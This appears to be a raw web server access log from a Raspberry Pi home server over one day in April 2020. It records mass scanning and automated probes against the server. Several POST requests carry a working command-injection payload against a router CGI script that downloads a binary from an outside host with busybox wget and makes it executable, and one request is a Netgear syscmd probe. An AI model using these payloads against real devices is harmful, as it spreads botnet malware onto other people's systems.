Thu Apr  2 06:25:06 MDT 2020
 06:25:06 up 37 days, 10:53,  1 user,  load average: 0.46, 0.28, 0.27
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 37days 29:53   1.96s /usr/bin/lxsession -s LXDE-pi -e LXDE
103.93.172.31 - - [02/Apr/2020:13:19:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
13.90.16.161 - - [02/Apr/2020:13:29:20 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
162.243.129.58 - - [02/Apr/2020:13:35:01 +0000] "GET /ReportServer HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
96.56.205.210 - - [02/Apr/2020:14:05:34 +0000] "GET / HTTP/1.1" 400 0 "" ""
162.250.19.7 - - [02/Apr/2020:14:29:03 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
162.250.19.7 - - [02/Apr/2020:14:32:02 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
79.143.186.114 - - [02/Apr/2020:14:50:25 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
159.65.11.106 - - [02/Apr/2020:15:11:00 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
171.67.70.85 - - [02/Apr/2020:15:19:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
103.73.182.52 - - [02/Apr/2020:15:23:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
80.82.65.234 - - [02/Apr/2020:16:56:46 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "Go-http-client/1.1"
202.168.64.24 - - [02/Apr/2020:17:29:06 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
202.168.64.24 - - [02/Apr/2020:17:29:09 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
80.82.65.234 - - [02/Apr/2020:18:00:47 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "Go-http-client/1.1"
94.102.49.65 - - [02/Apr/2020:18:08:52 +0000] "GET / HTTP/1.1" 200 25000 "" "libwww-perl/6.43"
186.64.111.98 - - [02/Apr/2020:19:38:45 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" ""
186.64.111.98 - - [02/Apr/2020:19:38:45 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
110.249.212.46 - - [02/Apr/2020:20:10:08 +0000] "GET /testget?q=23333&port=80 HTTP/1.1" 404 0 "" ""
110.249.212.46 - - [02/Apr/2020:20:18:54 +0000] "GET /testget?q=23333&port=80 HTTP/1.1" 404 0 "" ""
110.249.212.46 - - [02/Apr/2020:20:18:54 +0000] "GET /testget?q=23333&port=80 HTTP/1.1" 404 0 "" ""
110.249.212.46 - - [02/Apr/2020:20:18:55 +0000] "GET /testget?q=23333&port=80 HTTP/1.1" 404 0 "" ""
122.224.131.186 - - [02/Apr/2020:21:12:33 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
122.224.131.186 - - [02/Apr/2020:21:12:34 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
122.224.131.186 - - [02/Apr/2020:21:12:34 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
122.224.131.186 - - [02/Apr/2020:21:12:35 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
122.224.131.186 - - [02/Apr/2020:21:12:35 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
122.224.131.186 - - [02/Apr/2020:21:12:36 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
122.224.131.186 - - [02/Apr/2020:21:12:36 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
122.224.131.186 - - [02/Apr/2020:21:12:37 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
122.224.131.186 - - [02/Apr/2020:21:12:38 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
122.224.131.186 - - [02/Apr/2020:21:12:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
208.91.109.18 - - [02/Apr/2020:21:23:10 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
208.91.109.18 - - [02/Apr/2020:21:23:10 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
179.99.21.204 - - [02/Apr/2020:21:27:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
139.162.119.197 - - [02/Apr/2020:22:01:28 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)"
192.241.239.112 - - [02/Apr/2020:22:16:03 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
180.87.205.236 - - [02/Apr/2020:23:42:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
49.233.173.38 - - [03/Apr/2020:00:48:30 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
49.233.173.38 - - [03/Apr/2020:00:48:33 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.233.173.38 - - [03/Apr/2020:00:48:35 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.233.173.38 - - [03/Apr/2020:00:48:35 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.233.173.38 - - [03/Apr/2020:00:48:36 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.233.173.38 - - [03/Apr/2020:00:48:36 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.233.173.38 - - [03/Apr/2020:00:48:37 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.233.173.38 - - [03/Apr/2020:00:48:37 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.233.173.38 - - [03/Apr/2020:00:48:38 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.233.173.38 - - [03/Apr/2020:00:48:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
201.124.137.39 - - [03/Apr/2020:00:50:06 +0000] "GET / HTTP/1.1" 400 0 "" ""
89.40.73.227 - - [03/Apr/2020:01:46:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0"
171.67.70.85 - - [03/Apr/2020:02:14:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
13.77.107.52 - - [03/Apr/2020:02:26:57 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
164.132.92.162 - - [03/Apr/2020:02:31:00 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" ""
164.132.92.162 - - [03/Apr/2020:02:31:00 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
162.250.19.7 - - [03/Apr/2020:03:15:09 +0000] "GET /readme.txt HTTP/1.1" 304 0 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36"
162.250.19.7 - - [03/Apr/2020:03:15:42 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36"
162.250.19.7 - - [03/Apr/2020:03:16:05 +0000] "GET /ac0xl/logs/2020.04.02 HTTP/1.1" 200 7546 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36"
58.23.9.197 - - [03/Apr/2020:04:04:13 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
58.23.9.197 - - [03/Apr/2020:04:04:13 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
58.23.9.197 - - [03/Apr/2020:04:04:14 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
195.230.113.192 - - [03/Apr/2020:05:03:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
114.33.3.156 - - [03/Apr/2020:05:53:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
103.212.131.38 - - [03/Apr/2020:05:56:43 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
64.196.25.178 - - [03/Apr/2020:07:17:28 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" ""
64.196.25.178 - - [03/Apr/2020:07:17:28 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
85.100.157.30 - - [03/Apr/2020:07:43:07 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
189.211.214.132 - - [03/Apr/2020:07:46:23 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET"
189.211.214.132 - - [03/Apr/2020:07:46:23 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
132.145.136.225 - - [03/Apr/2020:07:57:49 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
132.145.136.225 - - [03/Apr/2020:07:57:53 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
132.145.136.225 - - [03/Apr/2020:07:57:53 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
132.145.136.225 - - [03/Apr/2020:07:57:53 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
132.145.136.225 - - [03/Apr/2020:07:57:53 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
132.145.136.225 - - [03/Apr/2020:07:57:54 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
132.145.136.225 - - [03/Apr/2020:07:57:54 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
132.145.136.225 - - [03/Apr/2020:07:57:54 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
132.145.136.225 - - [03/Apr/2020:07:57:54 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
132.145.136.225 - - [03/Apr/2020:07:57:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
177.131.125.163 - - [03/Apr/2020:08:04:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
177.105.239.254 - - [03/Apr/2020:09:46:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
162.243.130.34 - - [03/Apr/2020:10:00:16 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
61.219.11.153 - - [03/Apr/2020:10:27:17 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
139.228.254.97 - - [03/Apr/2020:10:51:49 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1" 400 0 "" "Mozilla/5.0"
34.77.104.14 - - [03/Apr/2020:10:51:53 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4"
139.228.254.97 - - [03/Apr/2020:10:51:55 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
47.111.19.40 - - [03/Apr/2020:11:00:17 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
124.244.19.213 - - [03/Apr/2020:11:07:41 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" ""
124.244.19.213 - - [03/Apr/2020:11:07:41 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.189.176.208 - - [03/Apr/2020:11:27:38 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
171.67.70.85 - - [03/Apr/2020:11:29:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
189.147.96.217 - - [03/Apr/2020:11:49:54 +0000] "GET / HTTP/1.0" 200 25000 "" ""
Fri Apr  3 06:25:06 MDT 2020
 06:25:06 up 38 days, 10:53,  1 user,  load average: 0.37, 0.26, 0.23
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 38days 30:41   2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE